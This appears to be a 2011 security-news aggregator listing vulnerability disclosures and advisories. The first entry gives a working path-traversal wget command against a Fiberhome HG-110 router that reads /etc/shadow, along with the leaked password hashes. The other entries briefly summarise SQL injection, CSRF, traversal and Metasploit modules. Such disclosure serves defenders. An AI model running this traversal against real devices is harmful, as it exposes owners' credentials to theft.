Re: Fiberhome HG-110 (adsl/router) vulnerabilities
Posted by Zerial. on Apr 10You can include /etc/shadow:
$ wget -o /dev/null -O - "http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns"
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::...
Source: Re: Fiberhome HG-110 (adsl/router) vulnerabilities
Mandriva Linux Security Advisory 2011-071
Mandriva Linux Security Advisory 2011-071 - kio/kio/tcpslavebase.cpp in KDE KSSL in kdelibs before 4.6.1 does not properly verify that the server hostname matches the...
1024cms ACP 1.1.0 Complete Modules Directory Traversal
1024cms Admin Control Panel version 1.1.0 Beta Complete-Modules package suffers from a directory traversal vulnerability.
Source: 1024cms ACP 1.1.0 Complete Modules Directory Traversal
Gmail login status detect
Posted by IEhrepus on Apr 09http://www.80vul.com/test/gflashtoxml.htm
hitest
Source: Gmail login status detect
ManageEngine Applications Manager Authenticated Code Execution
This Metasploit module logs into the Manage Engine Applications Manager to upload a payload to the file system and a batch script that executes...
[SECURITY] [DSA 2215-1] gitolite security update
Posted by Nico Golde on Apr 09-------------------------------------------------------------------------
Debian Security Advisory DSA-2215-1 ...
Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution
This Metasploit module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The "exec" function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to...
Mandriva Linux Security Advisory 2011-072
Mandriva Linux Security Advisory 2011-072 - It was discovered that gwenhywfar was using an old private copy of the ca-bundle.crt file containing the root...
Watchdek Force Delete Cross Site Request Forgery
Watchdek Social Networking suffers from a cross site request forgery vulnerability.
Source: Watchdek Force Delete Cross Site Request Forgery
Turkish Videoopro 2 SQL Injection
Turkish Videoopro version 2 suffers from a remote SQL injection vulnerability.
Source: Turkish Videoopro 2 SQL Injection






